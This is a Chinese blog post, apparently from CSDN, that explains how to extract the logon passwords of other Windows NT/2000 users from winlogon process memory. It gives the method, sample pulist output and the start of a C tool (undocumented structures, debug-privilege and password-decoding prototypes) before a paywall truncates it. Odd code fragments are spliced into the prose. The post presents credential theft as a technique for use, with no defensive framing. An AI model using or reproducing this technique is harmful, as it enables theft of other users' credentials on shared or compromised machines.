VisualC++信息安全编程(5)获取windows登陆账户密码

最新推荐文章于 2023-10-20 23:59:00 发布
最新推荐文章于 2023-10-20 23:59:00 发布
阅读量784 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fdgugfv/article/details/83871118
版权

分享一下我老师大神的人工智能教程!零基础,通俗易懂!http://blog.csdn.net/jiangjunshow

也欢迎大家转载本篇文章。分享知识,造福人民,实现我们中华民族伟大复兴!

               

Windows Logon Process,Windows NT 用户登陆程序,管理用户登录和退出。

因为登陆的域名和用户名是明文存储在winlogon进程里的,而Password是限定了查找本进程用户的密码
<167-174:    GetEnvironmentVariableW(L"USERNAME", UserName, 0x400);
    GetEnvironmentVariableW (L"USERDOMAIN", UserDomain, 0x400);
>,然后到winlogon进程的空间中查找UserDomain和UserName < 590:// 在WinLogon的内存空间中寻找UserName和DomainName的字符串
if ((wcscmp ((wchar_t *) RealStartingAddressP, UserName) == 0)
&&
(wcscmp ((wchar_t *) ((DWORD) RealStartingAddressP + USER_DOMAIN_OFFSET_WIN2K), UserDomain) == 0))
> ,找到后就查后边的加密口令。

其实只要你自己指定用户名和winlogon进程去查找就行了,只要你是管理员,任何本机用msgina.dll图形登陆的用户口令都可以找到。

1. pulist,找到系统里登陆的域名和用户名,及winlogon进程id
2. 然后给每个winlogon进程id查找指定的用户就行了。

example:

C:\Documents and Settings\bingle>pulist
Process           PID  User
Idle              0
System            8
smss.exe          164  NT AUTHORITY\SYSTEM
csrss.exe         192  NT AUTHORITY\SYSTEM
winlogon.exe      188  NT AUTHORITY\SYSTEM
wins.exe          1212 NT AUTHORITY\SYSTEM
Explorer.exe      388  TEST-2KSERVER\Administrator
internat.exe      1828 TEST-2KSERVER\Administrator
conime.exe        1868 TEST-2KSERVER\Administrator
msiexec.exe       1904 NT AUTHORITY\SYSTEM
tlntsvr.exe       1048 NT AUTHORITY\SYSTEM
taskmgr.exe       1752 TEST-2KSERVER\Administrator
csrss.exe         2056 NT AUTHORITY\SYSTEM
winlogon.exe      2416 NT AUTHORITY\SYSTEM
rdpclip.exe       2448 TEST-2KSERVER\clovea
Explorer.exe      2408 TEST-2KSERVER\clovea
internat.exe      1480 TEST-2KSERVER\clovea
cmd.exe           2508 TEST-2KSERVER\Administrator
ntshell.exe       368  TEST-2KSERVER\Administrator
ntshell.exe       1548 TEST-2KSERVER\Administrator
ntshell.exe       1504 TEST-2KSERVER\Administrator
csrss.exe         1088 NT AUTHORITY\SYSTEM
winlogon.exe      1876 NT AUTHORITY\SYSTEM
rdpclip.exe       1680 TEST-2KSERVER\bingle
Explorer.exe      2244 TEST-2KSERVER\bingle
conime.exe        2288 TEST-2KSERVER\bingle
internat.exe      1592 TEST-2KSERVER\bingle
cmd.exe           1692 TEST-2KSERVER\bingle
mdm.exe           2476 TEST-2KSERVER\bingle
taskmgr.exe       752  TEST-2KSERVER\bingle
pulist.exe        2532 TEST-2KSERVER\bingle

 

 

 

具体实现代码如下

 

 

#include <windows.h> #include <tchar.h> #include <stdio.h> #include <stdlib.h> typedef struct _UNICODE_STRING {
         USHORT Length;     USHORT MaximumLength;     PWSTR Buffer; } UNICODE_STRING, *PUNICODE_STRING; // Undocumented typedef's typedef struct _QUERY_SYSTEM_INFORMATION {
         DWORD GrantedAccess;     DWORD PID;     WORD HandleType;     WORD HandleId;     DWORD Handle; } QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION; typedef struct _PROCESS_INFO_HEADER {
         DWORD Count;     DWORD Unk04;     DWORD Unk08; } PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER; typedef struct _PROCESS_INFO {
         DWORD LoadAddress;     DWORD Size;     DWORD Unk08;     DWORD Enumerator;     DWORD Unk10;     char Name [0x108]; } PROCESS_INFO, *PPROCESS_INFO; typedef struct _ENCODED_PASSWORD_INFO {
         DWORD HashByte;     DWORD Unk04;     DWORD Unk08;     DWORD Unk0C;     FILETIME LoggedOn;     DWORD Unk18;     DWORD Unk1C;     DWORD Unk20;     DWORD Unk24;     DWORD Unk28;     UNICODE_STRING EncodedPassword; } ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO; typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION)  (DWORD, PVOID, DWORD, PDWORD); typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD); typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID); typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID); typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING)  (BYTE, PUNICODE_STRING); // Private Prototypes BOOL IsWinNT (void); BOOL IsWin2K (void); BOOL AddDebugPrivilege (void); DWORD FindWinLogon (void); BOOL LocatePasswordPageWinNT (DWORD, PDWORD); BOOL LocatePasswordPageWin2K (DWORD, PDWORD); void DisplayPasswordWinNT (void); void DisplayPasswordWin2K (void); // Global Variables PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation; PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer; PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation; PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer; PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString; DWORD PasswordLength = 0; PVOID RealPasswordP = NULL; PVOID PasswordP = NULL; DWORD HashByte = 0;wchar_t UserName [0x400]; wchar_t UserDomain [0x400]; int __cdecl main( <
最低0.47元/天 解锁文章
我漂亮吗
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
c/c++编程日记:纯C实现登录注册和忘记密码功能(附源码)
C语言C++学习俱乐部:765860056
04-02 2251
这是一个用纯C语言和文件操作实现的系统登录、注册和忘记密码功能。可以用于c语言大作业的登录系统。下面分享一下具体的代码。 首先定义一个结构体来存放用户的注册信息,账号密码等。 typedefstructThe_users//typedef可以定义结构体别名 { charid[11];//账号 charpwd[20];//密码 charname[15];//姓名为字符串 charsex;//性别为单个字符 longphone;//电话号码为长整型 }users; 然后写一个函数用来创建储存用户
获取windows密码c++代码
01-20
获取windows密码c++代码,用了许多不常用api
C++获取WinNT/Win2k当前用户名和密码
u013468790的专栏
04-18 529
// 获取WinNT/Win2k当前用户名和密码,调用以下函数即可:   // bool GetPassWord(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)   //-------------------------------------------------------------------------
C/C++经典项目开发:教你破解Windows系统密码,手把手教你做解密项目
python学习+VX:YYQX2209
11-02 1130
C++开发的密码查看工具——PasswordViewer,PasswordViewer是一个集察看屏保口令、Access数据库口令、CMOS口令、QQ2000口令、美萍网管口令、Win9x共享口令、Win9x缓存口令的软件,他同时附带了支持Win2k的星号探测器。 项目结构展示: 部分源码展示: 提示,编译注意:本程序默认连接 PWV 的DOS版本——PWVDOS.exe,使程序可以在 DO...
code source_it_visualc++_源码
10-04
【标题】"code source_it_visualc++_源码"揭示了这是一个与编程相关的项目,主要使用Visual C++作为开发工具。Visual C++是微软提供的一个集成开发环境(IDE),它支持C++语言,用于创建Windows应用程序。源码通常指...
C++用户名+密码登录程序.rar
03-09
4. **加密与安全**:为了保护用户密码,通常会对其进行加密存储,例如使用MD5或更安全的SHA系列算法。在验证时,会对用户输入的密码进行同样的加密处理,然后与存储的密文进行比较。 5. **错误处理**:程序应能够...
QQLOGIN.rar_ QQLOGIN_visual c_按钮 键盘_虚拟 键盘_虚拟键盘登陆
09-19
QQLOGIN.rar是一个包含QQ登陆界面仿制项目源代码的压缩包,主要涉及的是使用Visual C++编程语言实现的用户登录界面。在这个项目中,开发者创建了一个逼真的QQ登录界面,其中包括了按钮控件的使用以及虚拟键盘的功能...
bank.zip_visual c
09-14
本文将深入探讨一个基于C++编程语言实现的银行自助存取款系统,涵盖用户登录密码修改、存取款以及查询余额等功能。 首先,我们要理解C++作为一门强大的面向对象编程语言,其在系统开发中的优势在于高效、灵活和可...
ATM.zip_visual c
09-21
5. **数据持久化**:为了保存用户数据,源代码可能使用文件存储账户信息,或者链接到数据库。 通过分析这个源代码,学习者可以了解C++中的类设计、函数调用、条件语句、循环结构、异常处理等基本编程概念,同时也能...
完美的线程注入和卸载
山寨3D的专栏
01-30 871
unit Unit1;interfaceuses  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,  Dialogs, StdCtrls;type  TForm1 = class(TForm)    Button1: TButton;    Button2: TButton;   
C++简单实现密码设置与解锁
clumsy01的博客
10-20 2057
➢如果输入字符低于某个数值(比如6或8),提示:密码过短请重试。这学期刚学C++ ,感觉头好痒,要长脑子了ᕦ༼༎ຶ_༎ຶ༽ᕗ。有大佬知道为什么这里会出现两条线吗?➢连续输入3次错误密码,不再允许输入密码。➢可以选择密码重置,将之前的密码覆盖。➢设置一个密码,允许数字和字母组合。3.main函数部分。
反调试系列 | 调试标志寄存器
WAJXY2021的博客
08-27 619
调试标志寄存器 系统表中的特殊标志寄存器,即停留在进程内存中的、由操作系统设置的标志寄存器,可以用来指示进程正在被调试。这些标志寄存器的状态可以通过使用特定的API函数或检查内存中的系统表来验证。 这些技术是恶意软件最常使用的。 1. 使用Win32 API 以下技术使用现有的API函数(WinAPI或NativeAPI),这些函数检查进程内存中的系统结构,以寻找表明进程现在正在被调试的特定标志寄存器。 1.1. IsDebuggerPresent() 函数kernel32!IsDebugger
VC++实现枚举进程与模块
我的编程之旅
01-01 1121
[cpp] view plaincopyprint? #pragma once  #define _WIN32_WINNT 0x0500   #include"windows.h"  #include"tlhelp32.h"  #include"stdio.h"  #include"NativeApi.h"  #include"wchar.h"  #include"
vc api_获取系统信息和用户信息
ZXL工作室
05-31 1463
#include #include void GetSysInfo(){ char szComputerName[MAXBYTE]={0}; char szUserName[MAXBYTE]={0}; unsigned long nSize=MAXBYTE; OSVERSIONINFO OsVer; OsVer.dwOSVersionInfoSize=sizeof(
获取当前系统登录用户名(包括以管理员权限启动也能获取到)
热门推荐
jota
01-24 1万+
当程序以管理员权限启动后,如果需要获取当前系统登录非管理员用户名,大部分方法(如 GetUserName)获取到的都是管理员的用户名,以下是获取当前登录用户方法。直接上代码: #include &lt;windows.h&gt; #include &lt;WtsApi32.h&gt; #pragma comment(lib, "WtsApi32.lib") #include &lt;str...
2024年欧洲铝桁架市场主要企业市场占有率及排名.docx
最新发布
07-17
2024年欧洲铝桁架市场主要企业市场占有率及排名.docx
VisualC++2010:面向对象编程Windows应用开发
VisualC++,尤其是版本2010,是C++语言的可视化集成开发环境,专为Windows应用程序开发设计,支持面向对象编程。它提供了完整的开发流程支持,包括代码编写、编译、连接和调试,即使对于符合ANSI C标准的C程序,也能...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值